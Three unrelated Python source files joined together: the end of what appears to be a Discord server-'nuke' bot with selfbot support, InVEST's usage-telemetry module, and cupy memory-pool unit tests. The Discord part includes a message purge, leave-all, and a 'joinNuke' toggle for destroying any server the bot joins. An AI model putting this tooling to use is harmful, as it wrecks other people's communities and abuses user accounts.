r = requests.delete(f'https://discord.com/api/v8/channels/{ctx.channel.id}/messages/{message.id}', headers=headers)
if r.status_code == 429:
delay_time = r.json()['retry_after']
consoleLog(f'Rate limit reached. Purging delay has been set to {delay_time} seconds.')
else:
break
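# Sketch of the 429 handling above: a rate-limited delete returns a JSON body
# containing a retry_after value (shape per Discord's API docs, e.g.
# {"retry_after": 1.25, ...}; exact fields may vary), and that value becomes
# the per-message delay for the remaining deletes.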
@commands.check(checkPerm)
@client.command(name='leave')
async def leave(ctx, name=None):
if name is None:
if not await hasTarget(ctx):
return
await selected_server.leave()
else:
server = containing(client.guilds, name)
if server is None:
await log(ctx, f'Unable to find server {name}.')
return
await server.leave()
if not isDM(ctx) and ctx.guild.id == selected_server.id:
consoleLog(f'{Fore.BLUE}Goodbye {selected_server.name}! {Fore.YELLOW}-> {Fore.GREEN}Left {Fore.RESET}{selected_server.name}.', True)
else:
await log(ctx, f'Goodbye {selected_server.name}! -> Left {selected_server.name}.')
@commands.check(checkPerm)
@client.command(name='leaveAll')
async def leaveAll(ctx):
await log(ctx, 'Leaving all servers. Note: You won\'t be able to message me after I left all servers.')
for server in client.guilds:
await server.leave()
consoleLog('Left all servers.', True)
@commands.check(checkPerm)
@client.command(name='joinNuke', aliases=['nukeOnJoin', 'join nuke'])
async def joinNuke(ctx, true_or_false):
global saved_ctx, nuke_on_join
if true_or_false.lower() == 'true':
saved_ctx = ctx
nuke_on_join = True
await log(ctx, 'Nuke on bot joining a new server has been turned on.')
elif true_or_false.lower() == 'false':
nuke_on_join = False
await log(ctx, 'Nuke on bot joining a new server has been turned off.')
else:
await log(ctx, 'Invalid flag: use true or false (not case sensitive).')
@commands.check(checkPerm)
@client.command(name='changeStatus', aliases=['cs'])
async def changeStatus(ctx, status):
if status == 'offline':
await client.change_presence(status=discord.Status.offline)
elif status == 'invisible':
await client.change_presence(status=discord.Status.invisible)
elif status == 'online':
await client.change_presence(status=discord.Status.online)
elif status == 'idle':
await client.change_presence(status=discord.Status.idle)
elif status == 'dnd' or status == 'do_not_disturb':
await client.change_presence(status=discord.Status.do_not_disturb)
@commands.check(checkPerm)
@client.command(name='link', aliases=['l'])
async def link(ctx):
if not is_selfbot:
await ctx.channel.send(f'https://discord.com/api/oauth2/authorize?client_id={client.user.id}&permissions={settings["bot_permission"]}&scope=bot')
else:
await log(ctx, f'This account is not a bot :). You can join servers with invite codes.')
@commands.check(checkPerm)
@client.command(name='autoNick', aliases=['an'])
async def autoNick(ctx):
if not await hasTarget(ctx):
return
global auto_nick
if not auto_nick:
consoleLog(f'{Fore.CYAN}Auto nickname is on.', True)
auto_nick = True
while auto_nick:
# payload = {'nick': ''.join(choice(alphanum) for _ in range(10))}
# q.put((requests.patch, f'https://discord.com/api/v8/guilds/{selected_server.id}/members/%40me/nick', headers, payload))
await selected_server.me.edit(nick=''.join(choices(alphanum, k=10)))
else:
consoleLog(f'{Fore.BLUE}Auto nickname is off.', True)
auto_nick = False
@commands.check(checkPerm)
@client.command(name='autoStatus', aliases=['as'])
async def autoStatus(ctx):
global auto_status
if not auto_status:
consoleLog(f'{Fore.CYAN}Auto status is on.', True)
auto_status = True
while auto_status:
await client.change_presence(status=discord.Status.online)
await asyncio.sleep(random() + 0.3) # There's a rate limit for changing status (every minute or 5 minutes; I haven't figured out the exact number), so I'll stay with this sleep command
await client.change_presence(status=discord.Status.offline)
await asyncio.sleep(random() + 0.3)
else:
consoleLog(f'{Fore.BLUE}Auto status is off.', True)
auto_status = False
@commands.check(checkPerm)
@client.command(name='off', aliases=['logout', 'logoff', 'shutdown', 'stop'])
async def off(ctx):
### Discord takes a while to show the bot as offline, so people might think the bot didn't turn off when Discord is just slow to update its status
await changeStatus(None, 'offline')
await client.logout()
###### Closing handler ######
###### https://github.com/aio-libs/aiohttp/issues/4324
from functools import wraps
from asyncio.proactor_events import _ProactorBasePipeTransport
def silence_event_loop_closed(func):
@wraps(func)
def wrapper(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
except RuntimeError as e:
if str(e) != 'Event loop is closed':
raise
return wrapper
_ProactorBasePipeTransport.__del__ = silence_event_loop_closed(_ProactorBasePipeTransport.__del__)
# PrivilegedIntents fixed fail :')
# async def login():
# global client
# try:
# await client.start(settings['token'], bot=not is_selfbot)
# except discord.PrivilegedIntentsRequired:
# print('PrivilegedIntentsRequired: This field is required to request for a list of members in the discord server that the bot is connected to. Watch https://youtu.be/DXnEFoHwL1A?t=44 to see how to turn on the required field.')
# # exit()
# client._connection = client._get_state(
# intents=client.intents.default()
# ) # reset intents to default
# input('lol')
# await login()
# except Exception as e:
# print(e)
# finally:
# sys.stdout.write('Exiting... \n')
# asyncio.run(login()) # if login failed because of the privileged intents then ask if user wants to turn off the intents
try:
client.run(settings['token'], bot=not is_selfbot)
except discord.PrivilegedIntentsRequired:
print('PrivilegedIntentsRequired: This field is required to request for a list of members in the discord server that the bot is connected to. Watch https://youtu.be/DXnEFoHwL1A?t=44 to see how to turn on the required field.')
exit()
except Exception as e:
print(e)
finally:
sys.stdout.write('Exiting... \n')
|
usage.py | """Module to that provides functions for usage logging."""
import contextlib
import hashlib
import json
import locale
import logging
import os
import platform
import sys
import threading
import traceback
import uuid
import importlib
from urllib.request import urlopen, Request
from urllib.parse import urlencode
from osgeo import gdal
from osgeo import osr
import natcap.invest
import pygeoprocessing
from .. import utils
ENCODING = sys.getfilesystemencoding()
LOGGER = logging.getLogger(__name__)
_ENDPOINTS_INDEX_URL = (
'http://data.naturalcapitalproject.org/server_registry/'
'invest_usage_logger_v2/index.html')
# This is defined here because it's very useful to know the thread name ahead
# of time so we can exclude any log messages it generates from the logging.
# Python doesn't mind multiple threads having the same name.
_USAGE_LOGGING_THREAD_NAME = 'usage-logging-thread'
@contextlib.contextmanager
def log_run(module, args):
"""Context manager to log an InVEST model run and exit status.
Args:
module (string): The string module name that identifies the model.
args (dict): The full args dictionary.
Returns:
``None``
"""
session_id = str(uuid.uuid4())
log_thread = threading.Thread(
target=_log_model, args=(module, args, session_id),
name=_USAGE_LOGGING_THREAD_NAME)
log_thread.start()
try:
yield
except Exception:
exit_status_message = traceback.format_exc()
raise
else:
exit_status_message = ':)'
finally:
log_exit_thread = threading.Thread(
target=_log_exit_status, args=(session_id, exit_status_message),
name=_USAGE_LOGGING_THREAD_NAME)
log_exit_thread.start()
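# A minimal usage sketch for ``log_run`` (the model name, args dict, and the
# ``execute`` call below are hypothetical placeholders, not a real run):
#
# args = {'workspace_dir': '/tmp/ws'}
# with log_run('natcap.invest.carbon', args):
#     carbon.execute(args)  # any exception here becomes the logged exit status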
def _calculate_args_bounding_box(args, args_spec):
"""Calculate the bounding boxes of any GIS types found in `args_dict`.
Args:
args (dict): a string key and any value pair dictionary.
args_spec (dict): the model ARGS_SPEC describing args
Returns:
bb_intersection, bb_union tuple of the lat/lng intersection and
union bounding boxes of the GIS types referred to in ``args``. If
no GIS types are present, this is a (None, None) tuple.
"""
def _merge_bounding_boxes(bb1, bb2, mode):
"""Merge two bounding boxes through union or intersection.
Args:
bb1 (list of float): bounding box of the form
[minx, maxy, maxx, miny] or None
bb2 (list of float): bounding box of the form
[minx, maxy, maxx, miny] or None
mode (string): either "union" or "intersection" indicating how to
combine the two bounding boxes.
Returns:
either the intersection or union of bb1 and bb2 depending
on mode. If either bb1 or bb2 is None, the other is returned.
If both are None, None is returned.
"""
if bb1 is None:
return bb2
if bb2 is None:
return bb1
if mode == "union":
comparison_ops = [min, max, max, min]
if mode == "intersection":
comparison_ops = [max, min, min, max]
bb_out = [op(x, y) for op, x, y in zip(comparison_ops, bb1, bb2)]
return bb_out
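# Worked example of the merge above, using boxes in the documented
# [minx, maxy, maxx, miny] order: bb1 = [0, 10, 5, 0], bb2 = [3, 8, 9, 2].
# union -> [min(0,3), max(10,8), max(5,9), min(0,2)] = [0, 10, 9, 0]
# intersection -> [max(0,3), min(10,8), min(5,9), max(0,2)] = [3, 8, 5, 2]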
bb_intersection = None
bb_union = None
for key, value in args.items():
# Using gdal.OpenEx to check if an input is spatial caused the
# model to hang sometimes (possible race condition), so only
# get the bounding box of inputs that are known to be spatial.
spatial_info = None
if args_spec['args'][key]['type'] == 'raster':
spatial_info = pygeoprocessing.get_raster_info(value)
elif args_spec['args'][key]['type'] == 'vector':
spatial_info = pygeoprocessing.get_vector_info(value)
if spatial_info:
local_bb = spatial_info['bounding_box']
projection_wkt = spatial_info['projection_wkt']
spatial_ref = osr.SpatialReference()
spatial_ref.ImportFromWkt(projection_wkt)
try:
# means there's a GIS type with a well defined bounding box
# create transform, and reproject local bounding box to
# lat/lng
lat_lng_ref = osr.SpatialReference()
lat_lng_ref.ImportFromEPSG(4326) # EPSG 4326 is lat/lng
to_lat_trans = utils.create_coordinate_transformer(
spatial_ref, lat_lng_ref)
for point_index in [0, 2]:
local_bb[point_index], local_bb[point_index + 1], _ = (
to_lat_trans.TransformPoint(
local_bb[point_index],
local_bb[point_index+1]))
bb_intersection = _merge_bounding_boxes(
local_bb, bb_intersection, 'intersection')
bb_union = _merge_bounding_boxes(
local_bb, bb_union, 'union')
except Exception as transform_error:
# All kinds of exceptions from bad transforms or CSV files
# or dbf files could get us to this point, just don't
# bother with the local_bb at all
LOGGER.exception('Error when transforming coordinates: %s',
transform_error)
else:
LOGGER.debug(f'Arg {key} of type {args_spec["args"][key]["type"]} '
'excluded from bounding box calculation')
return bb_intersection, bb_union
def _log_exit_status(session_id, status):
"""Log the completion of a model with the given status.
Args:
session_id (string): a unique string that can be used to identify
the current session between the model initial start and exit.
status (string): a string describing the exit status of the model,
'success' would indicate the successful completion while an
exception string could indicate a failure.
Returns:
None
"""
logger = logging.getLogger('natcap.invest.ui.usage._log_exit_status')
try:
payload = {
'session_id': session_id,
'status': status,
}
log_finish_url = json.loads(urlopen(
_ENDPOINTS_INDEX_URL).read().strip())['FINISH']
# The data must be a python string of bytes. This will be ``bytes``
# in python3.
urlopen(Request(log_finish_url, urlencode(payload).encode('utf-8')))
except Exception as exception:
# An exception was thrown, we don't care.
logger.warning(
'an exception was encountered in _log_exit_status: %s',
str(exception))
def _log_model(model_name, model_args, session_id=None):
"""Log information about a model run to a remote server.
Args:
model_name (string): a python string of the package version.
model_args (dict): the traditional InVEST argument dictionary.
Returns:
None
"""
logger = logging.getLogger('natcap.invest.ui.usage._log_model')
def _node_hash():
"""Return a hash for the current computational node."""
data = {
'os': platform.platform(),
'hostname': platform.node(),
'userdir': os.path.expanduser('~')
}
md5 = hashlib.md5()
# a json dump will handle non-ascii encodings
# but then data must be encoded before hashing in Python 3.
md5.update(json.dumps(data).encode('utf-8'))
return md5.hexdigest()
args_spec = importlib.import_module(model_name).ARGS_SPEC
try:
bounding_box_intersection, bounding_box_union = (
_calculate_args_bounding_box(model_args, args_spec))
payload = {
'model_name': model_name,
'invest_release': natcap.invest.__version__,
'node_hash': _node_hash(),
'system_full_platform_string': platform.platform(),
'system_preferred_encoding': locale.getdefaultlocale()[1],
'system_default_language': locale.getdefaultlocale()[0],
'bounding_box_intersection': str(bounding_box_intersection),
'bounding_box_union': str(bounding_box_union),
'session_id': session_id,
}
log_start_url = json.loads(urlopen(
_ENDPOINTS_INDEX_URL).read().strip())['START']
# The data must be a python string of bytes. This will be ``bytes``
# in python3.
urlopen(Request(log_start_url, urlencode(payload).encode('utf-8')))
except Exception as exception:
# An exception was thrown, we don't care.
logger.warning(
'an exception was encountered when logging: %s', repr(exception))
|
test_memory.py | import ctypes
import gc
import pickle
import sys
import threading
import unittest
import fastrlock
import cupy.cuda
from cupy.cuda import device
from cupy.cuda import memory
from cupy.cuda import stream as stream_module
from cupy import testing
class MockMemory(memory.Memory):
cur_ptr = 1
def __init__(self, size):
self.ptr = MockMemory.cur_ptr
MockMemory.cur_ptr += size
self.size = size
self.device_id = 0
def __del__(self):
self.ptr = 0
def mock_alloc(size):
mem = MockMemory(size)
return memory.MemoryPointer(mem, 0)
class TestUnownedMemoryClass(unittest.TestCase):
def test_inherits_base_memory(self):
assert issubclass(memory.UnownedMemory, memory.BaseMemory)
@testing.parameterize(*testing.product({
'allocator': [memory._malloc, memory.malloc_managed],
'specify_device_id': [True, False],
}))
@testing.gpu
class TestUnownedMemory(unittest.TestCase):
def check(self, device_id):
size = 24
shape = (2, 3)
dtype = cupy.float32
with device.Device(device_id):
src_mem_ptr = self.allocator(size)
src_ptr = src_mem_ptr.ptr
args = (src_ptr, size, src_mem_ptr)
kwargs = {}
if self.specify_device_id:
kwargs = {'device_id': device_id}
unowned_mem = memory.UnownedMemory(*args, **kwargs)
assert unowned_mem.size == size
assert unowned_mem.ptr == src_ptr
assert unowned_mem.device_id == device_id
arr = cupy.ndarray(shape, dtype, memory.MemoryPointer(unowned_mem, 0))
# Delete the source object
del src_mem_ptr
with device.Device(device_id):
arr[:] = 2
assert (arr == 2).all()
def test_device0(self):
self.check(0)
@testing.multi_gpu(2)
def test_device1(self):
self.check(1)
@testing.gpu
class TestMemoryPointer(unittest.TestCase):
def test_int(self):
pval = MockMemory.cur_ptr
memptr = mock_alloc(1)
self.assertEqual(pval, int(memptr))
def test_add(self):
pval = MockMemory.cur_ptr
memptr = mock_alloc(8)
memptr2 = memptr + 4
self.assertIsInstance(memptr2, memory.MemoryPointer)
self.assertEqual(pval + 4, int(memptr2))
memptr3 = 4 + memptr
self.assertIsInstance(memptr3, memory.MemoryPointer)
self.assertEqual(pval + 4, int(memptr3))
memptr += 4
self.assertIsInstance(memptr, memory.MemoryPointer)
self.assertEqual(pval + 4, int(memptr))
def test_sub(self):
pval = MockMemory.cur_ptr
memptr = mock_alloc(8) + 4
memptr2 = memptr - 4
self.assertIsInstance(memptr2, memory.MemoryPointer)
self.assertEqual(pval, int(memptr2))
memptr -= 4
self.assertIsInstance(memptr, memory.MemoryPointer)
self.assertEqual(pval, int(memptr))
def test_copy_to_and_from_host(self):
a_gpu = memory.alloc(4)
a_cpu = ctypes.c_int(100)
a_gpu.copy_from(ctypes.cast(ctypes.byref(a_cpu), ctypes.c_void_p), 4)
b_cpu = ctypes.c_int()
a_gpu.copy_to_host(
ctypes.cast(ctypes.byref(b_cpu), ctypes.c_void_p), 4)
self.assertEqual(b_cpu.value, a_cpu.value)
def test_copy_from_device(self):
a_gpu = memory.alloc(4)
a_cpu = ctypes.c_int(100)
a_gpu.copy_from(ctypes.cast(ctypes.byref(a_cpu), ctypes.c_void_p), 4)
b_gpu = memory.alloc(4)
b_gpu.copy_from(a_gpu, 4)
b_cpu = ctypes.c_int()
b_gpu.copy_to_host(
ctypes.cast(ctypes.byref(b_cpu), ctypes.c_void_p), 4)
self.assertEqual(b_cpu.value, a_cpu.value)
def test_memset(self):
a_gpu = memory.alloc(4)
a_gpu.memset(1, 4)
a_cpu = ctypes.c_ubyte()
for i in range(4):
a_gpu.copy_to_host(
ctypes.cast(ctypes.byref(a_cpu), ctypes.c_void_p), 1)
self.assertEqual(a_cpu.value, 1)
a_gpu += 1
# -----------------------------------------------------------------------------
# Memory pool
@testing.gpu
class TestSingleDeviceMemoryPool(unittest.TestCase):
def setUp(self):
self.pool = memory.SingleDeviceMemoryPool(allocator=mock_alloc)
self.unit = memory._allocation_unit_size
self.stream = stream_module.Stream()
self.stream_ptr = self.stream.ptr
def test_round_size(self):
self.assertEqual(memory._round_size(self.unit - 1), self.unit)
self.assertEqual(memory._round_size(self.unit), self.unit)
self.assertEqual(memory._round_size(self.unit + 1), self.unit * 2)
def test_bin_index_from_size(self):
self.assertEqual(memory._bin_index_from_size(self.unit - 1), 0)
self.assertEqual(memory._bin_index_from_size(self.unit), 0)
self.assertEqual(memory._bin_index_from_size(self.unit + 1), 1)
def test_split(self):
mem = MockMemory(self.unit * 4)
chunk = memory._Chunk(mem, 0, mem.size, self.stream_ptr)
tail = chunk.split(self.unit * 2)
self.assertEqual(chunk.ptr(), mem.ptr)
self.assertEqual(chunk.offset, 0)
self.assertEqual(chunk.size, self.unit * 2)
self.assertEqual(chunk.prev, None)
self.assertEqual(chunk.next.ptr(), tail.ptr())
self.assertEqual(chunk.stream_ptr, self.stream_ptr)
self.assertEqual(tail.ptr(), mem.ptr + self.unit * 2)
self.assertEqual(tail.offset, self.unit * 2)
self.assertEqual(tail.size, self.unit * 2)
self.assertEqual(tail.prev.ptr(), chunk.ptr())
self.assertEqual(tail.next, None)
self.assertEqual(tail.stream_ptr, self.stream_ptr)
tail_of_head = chunk.split(self.unit)
self.assertEqual(chunk.ptr(), mem.ptr)
self.assertEqual(chunk.offset, 0)
self.assertEqual(chunk.size, self.unit)
self.assertEqual(chunk.prev, None)
self.assertEqual(chunk.next.ptr(), tail_of_head.ptr())
self.assertEqual(chunk.stream_ptr, self.stream_ptr)
self.assertEqual(tail_of_head.ptr(), mem.ptr + self.unit)
self.assertEqual(tail_of_head.offset, self.unit)
self.assertEqual(tail_of_head.size, self.unit)
self.assertEqual(tail_of_head.prev.ptr(), chunk.ptr())
self.assertEqual(tail_of_head.next.ptr(), tail.ptr())
self.assertEqual(tail_of_head.stream_ptr, self.stream_ptr)
tail_of_tail = tail.split(self.unit)
self.assertEqual(tail.ptr(), chunk.ptr() + self.unit * 2)
self.assertEqual(tail.offset, self.unit * 2)
self.assertEqual(tail.size, self.unit)
self.assertEqual(tail.prev.ptr(), tail_of_head.ptr())
self.assertEqual(tail.next.ptr(), tail_of_tail.ptr())
self.assertEqual(tail.stream_ptr, self.stream_ptr)
self.assertEqual(tail_of_tail.ptr(), mem.ptr + self.unit * 3)
self.assertEqual(tail_of_tail.offset, self.unit * 3)
self.assertEqual(tail_of_tail.size, self.unit)
self.assertEqual(tail_of_tail.prev.ptr(), tail.ptr())
self.assertEqual(tail_of_tail.next, None)
self.assertEqual(tail_of_tail.stream_ptr, self.stream_ptr)
def test_merge(self):
mem = MockMemory(self.unit * 4)
chunk = memory._Chunk(mem, 0, mem.size, self.stream_ptr)
chunk_ptr = chunk.ptr()
chunk_offset = chunk.offset
chunk_size = chunk.size
tail = chunk.split(self.unit * 2)
head = chunk
head_ptr = head.ptr()
head_offset = head.offset
head_size = head.size
tail_ptr = tail.ptr()
tail_offset = tail.offset
tail_size = tail.size
tail_of_head = head.split(self.unit)
tail_of_tail = tail.split(self.unit)
head.merge(tail_of_head)
self.assertEqual(head.ptr(), head_ptr)
self.assertEqual(head.offset, head_offset)
self.assertEqual(head.size, head_size)
self.assertEqual(head.prev, None)
self.assertEqual(head.next.ptr(), tail_ptr)
self.assertEqual(head.stream_ptr, self.stream_ptr)
tail.merge(tail_of_tail)
self.assertEqual(tail.ptr(), tail_ptr)
self.assertEqual(tail.offset, tail_offset)
self.assertEqual(tail.size, tail_size)
self.assertEqual(tail.prev.ptr(), head_ptr)
self.assertEqual(tail.next, None)
self.assertEqual(tail.stream_ptr, self.stream_ptr)
head.merge(tail)
self.assertEqual(head.ptr(), chunk_ptr)
self.assertEqual(head.offset, chunk_offset)
self.assertEqual(head.size, chunk_size)
self.assertEqual(head.prev, None)
self.assertEqual(head.next, None)
self.assertEqual(head.stream_ptr, self.stream_ptr)
def test_alloc(self):
p1 = self.pool.malloc(self.unit * 4)
p2 = self.pool.malloc(self.unit * 4)
p3 = self.pool.malloc(self.unit * 8)
self.assertNotEqual(p1.ptr, p2.ptr)
self.assertNotEqual(p1.ptr, p3.ptr)
self.assertNotEqual(p2.ptr, p3.ptr)
def test_alloc_split(self):
p = self.pool.malloc(self.unit * 4)
ptr = p.ptr
del p
head = self.pool.malloc(self.unit * 2)
tail = self.pool.malloc(self.unit * 2)
self.assertEqual(ptr, head.ptr)
self.assertEqual(ptr + self.unit * 2, tail.ptr)
def test_alloc_limit(self):
self.pool.set_limit(size=(self.unit * 6))
p1 = self.pool.malloc(self.unit * 5)
p2 = self.pool.malloc(self.unit * 1)
with self.assertRaises(memory.OutOfMemoryError):
self.pool.malloc(self.unit)
self.pool.set_limit(size=(self.unit * 7))
p3 = self.pool.malloc(self.unit)
del p1, p2, p3
def test_free(self):
p1 = self.pool.malloc(self.unit * 4)
ptr1 = p1.ptr
del p1
p2 = self.pool.malloc(self.unit * 4)
self.assertEqual(ptr1, p2.ptr)
def test_free_stream(self):
p1 = self.pool.malloc(self.unit * 4)
ptr1 = p1.ptr
del p1
with self.stream:
p2 = self.pool.malloc(self.unit * 4)
self.assertNotEqual(ptr1, p2.ptr)
def test_free_merge(self):
p = self.pool.malloc(self.unit * 4)
ptr = p.ptr
del p
# merge head into tail
head = self.pool.malloc(self.unit * 2)
tail = self.pool.malloc(self.unit * 2)
self.assertEqual(ptr, head.ptr)
del tail
del head
p = self.pool.malloc(self.unit * 4)
self.assertEqual(ptr, p.ptr)
del p
# merge tail into head
head = self.pool.malloc(self.unit * 2)
tail = self.pool.malloc(self.unit * 2)
self.assertEqual(ptr, head.ptr)
del head
del tail
p = self.pool.malloc(self.unit * 4)
self.assertEqual(ptr, p.ptr)
del p
def test_free_different_size(self):
p1 = self.pool.malloc(self.unit * 4)
ptr1 = p1.ptr
del p1
p2 = self.pool.malloc(self.unit * 8)
self.assertNotEqual(ptr1, p2.ptr)
def test_free_all_blocks(self):
p1 = self.pool.malloc(self.unit * 4)
ptr1 = p1.ptr
del p1
self.pool.free_all_blocks()
p2 = self.pool.malloc(self.unit * 4)
self.assertNotEqual(ptr1, p2.ptr)
del p2
def test_free_all_blocks_split(self):
# do not free split blocks
p = self.pool.malloc(self.unit * 4)
del p
head = self.pool.malloc(self.unit * 2)
tail = self.pool.malloc(self.unit * 2)
tailptr = tail.ptr
del tail
self.pool.free_all_blocks()
p = self.pool.malloc(self.unit * 2)
self.assertEqual(tailptr, p.ptr)
del head
def test_free_all_blocks_stream(self):
p1 = self.pool.malloc(self.unit * 4)
ptr1 = p1.ptr
del p1
with self.stream:
p2 = self.pool.malloc(self.unit * 4)
ptr2 = p2.ptr
del p2
self.pool.free_all_blocks(stream=stream_module.Stream.null)
p3 = self.pool.malloc(self.unit * 4)
self.assertNotEqual(ptr1, p3.ptr)
self.assertNotEqual(ptr2, p3.ptr)
with self.stream:
p4 = self.pool.malloc(self.unit * 4)
self.assertNotEqual(ptr1, p4.ptr)
self.assertEqual(ptr2, p4.ptr)
def test_free_all_blocks_all_streams(self):
p1 = self.pool.malloc(self.unit * 4)
ptr1 = p1.ptr
del p1
with self.stream:
p2 = self.pool.malloc(self.unit * 4)
ptr2 = p2.ptr
del p2
self.pool.free_all_blocks()
p3 = self.pool.malloc(self.unit * 4)
self.assertNotEqual(ptr1, p3.ptr)
self.assertNotEqual(ptr2, p3.ptr)
with self.stream:
p4 = self.pool.malloc(self.unit * 4)
self.assertNotEqual(ptr1, p4.ptr)
self.assertNotEqual(ptr2, p4.ptr)
def test_free_all_free(self):
p1 = self.pool.malloc(self.unit * 4)
ptr1 = p1.ptr
del p1
with testing.assert_warns(DeprecationWarning):
self.pool.free_all_free()
p2 = self.pool.malloc(self.unit * 4)
self.assertNotEqual(ptr1, p2.ptr)
def test_used_bytes(self):
p1 = self.pool.malloc(self.unit * 2)
self.assertEqual(self.unit * 2, self.pool.used_bytes())
p2 = self.pool.malloc(self.unit * 4)
self.assertEqual(self.unit * 6, self.pool.used_bytes())
del p2
self.assertEqual(self.unit * 2, self.pool.used_bytes())
del p1
self.assertEqual(self.unit * 0, self.pool.used_bytes())
p3 = self.pool.malloc(self.unit * 1)
self.assertEqual(self.unit * 1, self.pool.used_bytes())
del p3
def test_used_bytes_stream(self):
p1 = self.pool.malloc(self.unit * 4)
del p1
with self.stream:
p2 = self.pool.malloc(self.unit * 2)
self.assertEqual(self.unit * 2, self.pool.used_bytes())
del p2
def test_free_bytes(self):
p1 = self.pool.malloc(self.unit * 2)
self.assertEqual(self.unit * 0, self.pool.free_bytes())
p2 = self.pool.malloc(self.unit * 4)
self.assertEqual(self.unit * 0, self.pool.free_bytes())
del p2
self.assertEqual(self.unit * 4, self.pool.free_bytes())
del p1
self.assertEqual(self.unit * 6, self.pool.free_bytes())
p3 = self.pool.malloc(self.unit * 1)
self.assertEqual(self.unit * 5, self.pool.free_bytes())
del p3
def test_free_bytes_stream(self):
p1 = self.pool.malloc(self.unit * 4)
del p1
with self.stream:
p2 = self.pool.malloc(self.unit * 2)
self.assertEqual(self.unit * 4, self.pool.free_bytes())
del p2
def test_total_bytes(self):
p1 = self.pool.malloc(self.unit * 2)
self.assertEqual(self.unit * 2, self.pool.total_bytes())
p2 = self.pool.malloc(self.unit * 4)
self.assertEqual(self.unit * 6, self.pool.total_bytes())
del p1
self.assertEqual(self.unit * 6, self.pool.total_bytes())
del p2
self.assertEqual(self.unit * 6, self.pool.total_bytes())
p3 = self.pool.malloc(self.unit * 1)
self.assertEqual(self.unit * 6, self.pool.total_bytes())
self.assertEqual(
self.pool.used_bytes() + self.pool.free_bytes(),
self.pool.total_bytes())
del p3
def test_total_bytes_stream(self):
p1 = self.pool.malloc(self.unit * 4)
del p1
with self.stream:
p2 = self.pool.malloc(self.unit * 2)
self.assertEqual(self.unit * 6, self.pool.total_bytes())
del p2
def test_get_limit(self):
# limit is disabled by default
self.assertEqual(0, self.pool.get_limit())
def test_set_limit_size(self):
self.pool.set_limit(size=1024)
self.assertEqual(1024, self.pool.get_limit())
self.pool.set_limit(size=2**33)
self.assertEqual(2**33, self.pool.get_limit())
self.pool.set_limit(size=0)
self.assertEqual(0, self.pool.get_limit())
with self.assertRaises(ValueError):
self.pool.set_limit(size=-1)
def test_set_limit_fraction(self):
_, total = cupy.cuda.runtime.memGetInfo()
self.pool.set_limit(fraction=0)
self.assertEqual(0, self.pool.get_limit())
self.pool.set_limit(fraction=0.5)
self.assertEqual(total * 0.5, self.pool.get_limit())
self.pool.set_limit(fraction=1.0)
self.assertEqual(total, self.pool.get_limit())
with self.assertRaises(ValueError):
self.pool.set_limit(fraction=-1)
with self.assertRaises(ValueError):
self.pool.set_limit(fraction=1.1)
def test_parse_limit_string(self):
parse_limit_string = self.pool._parse_limit_string
# size
param = parse_limit_string('0')
self.assertEqual(0, param['size'])
self.assertEqual(None, param['fraction'])
param = parse_limit_string('1073741824')
self.assertEqual(1073741824, param['size'])
self.assertEqual(None, param['fraction'])
# fraction
param = parse_limit_string('0%')
self.assertEqual(None, param['size'])
self.assertEqual(0.0, param['fraction'])
param = parse_limit_string('40%')
self.assertEqual(None, param['size'])
self.assertEqual(0.4, param['fraction'])
param = parse_limit_string('70.5%')
self.assertEqual(None, param['size'])
self.assertEqual(0.705, param['fraction'])
param = parse_limit_string('100%')
self.assertEqual(None, param['size'])
self.assertEqual(1.0, param['fraction'])
@testing.parameterize(*testing.product({
'allocator': [memory._malloc, memory.malloc_managed],
}))
@testing.gpu
class TestMemoryPool(unittest.TestCase):
def setUp(self):
self.pool = memory.MemoryPool(self.allocator)
def test_zero_size_alloc(self):
with cupy.cuda.Device(0):
mem = self.pool.malloc(0).mem
self.assertIsInstance(mem, memory.Memory)
self.assertNotIsInstance(mem, memory.PooledMemory)
def test_double_free(self):
with cupy.cuda.Device(0):
mem = self.pool.malloc(1).mem
mem.free()
mem.free()
def test_free_all_blocks(self):
with cupy.cuda.Device(0):
mem = self.pool.malloc(1).mem
self.assertIsInstance(mem, memory.BaseMemory)
self.assertIsInstance(mem, memory.PooledMemory)
self.assertEqual(self.pool.n_free_blocks(), 0)
mem.free()
self.assertEqual(self.pool.n_free_blocks(), 1)
self.pool.free_all_blocks()
self.assertEqual(self.pool.n_free_blocks(), 0)
def test_free_all_blocks_without_malloc(self):
with cupy.cuda.Device(0):
# call directly without malloc.
self.pool.free_all_blocks()
self.assertEqual(self.pool.n_free_blocks(), 0)
def test_free_all_free(self):
with cupy.cuda.Device(0):
mem = self.pool.malloc(1).mem
self.assertIsInstance(mem, memory.BaseMemory)
self.assertIsInstance(mem, memory.PooledMemory)
self.assertEqual(self.pool.n_free_blocks(), 0)
mem.free()
self.assertEqual(self.pool.n_free_blocks(), 1)
with testing.assert_warns(DeprecationWarning):
self.pool.free_all_free()
self.assertEqual(self.pool.n_free_blocks(), 0)
def test_free_all_free_without_malloc(self):
with cupy.cuda.Device(0):
# call directly without malloc.
with testing.assert_warns(DeprecationWarning):
self.pool.free_all_free()
self.assertEqual(self.pool.n_free_blocks(), 0)
def test_n_free_blocks_without_malloc(self):
with cupy.cuda.Device(0):
# call directly without malloc/free_all_free.
self.assertEqual(self.pool.n_free_blocks(), 0)
def test_used_bytes(self):
with cupy.cuda.Device(0):
self.assertEqual(0, self.pool.used_bytes())
def test_free_bytes(self):
with cupy.cuda.Device(0):
self.assertEqual(0, self.pool.free_bytes())
def test_total_bytes(self):
with cupy.cuda.Device(0):
self.assertEqual(0, self.pool.total_bytes())
@testing.gpu
class TestAllocator(unittest.TestCase):
def setUp(self):
self.pool = memory.MemoryPool()
memory.set_allocator(self.pool.malloc)
def tearDown(self):
memory.set_allocator()
self.pool.free_all_blocks()
def test_set_allocator(self):
with cupy.cuda.Device(0):
self.assertEqual(0, self.pool.used_bytes())
arr = cupy.arange(128, dtype=cupy.int64)
self.assertEqual(1024, arr.data.mem.size)
self.assertEqual(1024, self.pool.used_bytes())
@unittest.skipUnless(sys.version_info[0] >= 3,
'Only for Python3 or higher')
def test_reuse_between_thread(self):
def job(self):
cupy.arange(16)
self._error = False
# Run in main thread.
self._error = True
job(self)
self.assertFalse(self._error)
# Run in sub thread.
self._error = True
with cupy.cuda.Device(0):
t = threading.Thread(target=job, args=(self,))
t.daemon = True
t.start()
t.join()
self.assertFalse(self._error)
@testing.gpu
class TestAllocatorDefault(unittest.TestCase):
def setUp(self):
self.pool = cupy.get_default_memory_pool()
def tearDown(self):
memory.set_allocator(self.pool.malloc)
def _check_pool_not_used(self):
used_bytes = self.pool.used_bytes()
with cupy.cuda.Device(0):
